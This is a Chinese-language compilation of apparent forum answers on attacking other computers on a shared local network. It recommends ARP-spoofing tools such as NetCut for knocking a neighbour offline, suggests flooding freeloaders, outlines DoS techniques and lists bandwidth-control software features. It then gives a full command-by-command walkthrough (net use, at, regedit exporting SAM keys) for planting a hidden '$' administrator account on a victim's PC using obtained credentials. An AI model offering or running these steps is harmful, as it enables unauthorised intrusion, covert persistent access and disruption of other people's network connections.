2、局域网攻击
怎么攻击局域网络里的电脑?
网络剪刀手。
用法也比较简单
我看二楼的说的网络执法官我以前试过/
用处不是太大。
只要保证你们用的是同一台陆游器
就能让他掉线。
他必须得重起才能停止攻击
想怎么整他就怎么整他。。。
哈哈`
但是别被发现咯``
被发现的话就不好说了。。。下面是具体使用方法
利用ARP协议,网络剪刀手(NetCut
1.51)可以切断局域网里任何主机和网关之间的连接,使其断开与Internet的连接,同时也可以看到局域网内所有主机的IP地址和MAC地址。
安装使用非常简单,跟我来吧!
1.
安装NetCut,如果您的系统是Windows
9x,还需要重新启动。
2.
运行Netcut,系统开始对整个网段进行IP探测。
3.
一般情况下,Netcut可以检测出局域网内正在使用的IP
地址,以及所对应的用户名和MAC地址(见附图)。
4.
选中你想断开的局域网主机,如想多选请按住Shift
键。
5.
点击[剪断],被选主机就不能通过NetCut
上显示的网关来上网了。想恢复连接的话,就点击[恢复]按钮,网络可以马上恢复正常
去baidu搜索网络剪刀
大把大把的等你下载.
局域网攻击
p2p终结者
P2P终结者是由Net.Soft工作室开发的一套专门用来控制企业网络P2P下载流量的网络管理软件。软件针对目前P2P软件过多占用带宽的问题,提供了一个非常简单的解决方案。软件基于底层协议分析处理实现,具有很好的透明性。软件可以适应绝大多数网络环境,包括代理服务器、ADSL路由器共享上网,Lan专线等网络接入环境。
P2P终结者具有以下功能:
1.支持目前主流P2P协议控制(Bittorent,BaiduX,PP,Poco,Kamun,Thunder,Kugoo,eMule等)
2.支持P2P下载带宽限制自定义
3.支持指定主机全局带宽限制
4.主机网络带宽实时查看功能,可以使网络管理员对网络带宽使用情况做到一目了然
5.完全集成一些网络攻击工具的断开公网连接功能
6.IP-MAC绑定控制功能
7.网络主机通讯详细信息(IP报文内容分析)实时查看功能
8.HTTP下载自定义文件后缀控制功能
9.FTP下载限制功能
10.WWW站点自定义控制功能,支持黑名单、白名单方式
11.QQ,MSN,PoPo,UC聊天工具控制功能
12.控制日志记录
9.局域网非法Sniffer主机检测功能
10.支持绝大多数网络环境,网络结构不需要做任何改动,完美支持ADSL路由器+交换机网络环境
另外,该软件有一些颇有争议的功能,比如作为客户机可以控制其它客户机的network的应用。
还有不要在同一网络里开两个p2pover,否则会有IP错误
11.跨网段管理
在实际网络应用中,经常会遇到这样的情况:某局域网中同时存在着两个或两个以上的网段(即VLAN),各个网段间物理上联通,但相互之间不能访问,网络管理员要针对每一个网段单独进行的管理工作,重复工作量大,而且还增加了开销。针对这种的情况,聚生网管特别提供了的"透明跨网段管理"这项功能,来帮助网络管理员进行跨网段的管理工作。
12.自定义ACL规则
系统为网管人员提供自定义控制接口-ACL规则设置,通过ACL规则,你可以设置包括IP源地址、IP目标地址、协议号(TCP/UDP)、端口范围等参数的规则,系统将自动拦截符合规则的数据报文,通过使用ACL规则,你可以轻松的实现控制功能的灵活扩展。如控制局域网任意主机IP对任意公网IP的访问;控制任意的聊天工具、控制任意的网络游戏……
13.局域网安全管理
1、IP-MAC绑定:系统支持对局域网主机进行IP-MAC绑定,一旦发现非法主机,即可以将其隔离网络。
2、嗅探主机扫描:通过使用系统附带的"反侦听技术"以及windows的底层分析技术,可以检测出当前对局域网危害最为严重的三大攻击工具:如局域网终结者、网络执法官、网络剪刀手等。
解决p2p终结者的客户机不能访问安装机的问题 其主要原因是因为p2p修改了默认的 组 Users选项 解决方法如下操作
右击 我的电脑 -- 管理-- 计算机管理--本地用户和组 --组 双击Users选项 成员里
的内容删除 打开添加--高级--立即查找 选择Administrator和Guest --确定--确定--确
定 重启生效。
怎么攻击局域网内蹭网者电脑或手机
你可以在局域网内用APR攻击,百度搜索 局域网攻击工具 ,找到对方IP地址后并发10000,整死他。
你也可以用XP远程关机,或者在路由器上禁止他的IP联网,让他连到路由器,自己以为赚了大便宜,暗中窃喜时发现上不了网,让他沉浸在悲喜交加的痛苦中。。。
当然了,整完人后设置一个强一点的无线密码,防止别人又来蹭网。
dos攻击工具有哪些(局域网内)
ARP欺骗?可以用局域网终结者。就是ping也成啊!我比较喜欢用局域网终结者(ARP欺骗)和cmd的ping命令。但是如果别人有抗ARP欺骗的防火墙就没办法了(比如360防火墙)。 百度的资料……DoS攻击方法
Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。
Smurf:该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包,并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包,使该主机受到攻击。
Land-based:攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过IP欺骗的方式发送给被攻击主机,这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环,从而很大程度地降低了系统性能。
Ping of Death:根据TCP/IP的规范,一个包的长度最大为65536字节。尽管一个包的长度不能超过65536字节,但是一个包分成的多个片段的叠加却能做到。当一个主机收到了长度大于65536字节的包时,就是受到了Ping of Death攻击,该攻击会造成主机的宕机。
Teardrop:IP数据包在网络传递时,数据包可以分成更小的片段。攻击者可以通过发送两段(或者更多)数据包来实现TearDrop攻击。第一个包的偏移量为0,长度为N,第二个包的偏移量小于N。为了合并这些数据段,TCP/IP堆栈会分配超乎寻常的巨大资源,从而造成系统资源的缺乏甚至机器的重新启动。
PingSweep:使用ICMP Echo轮询多个主机。
Pingflood: 该攻击在短时间内向目的主机发送大量ping包,造成网络堵塞或主机资源耗尽。
谁知道怎样在局域网攻击别人电脑,或者有什么好的软件介绍个!
我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~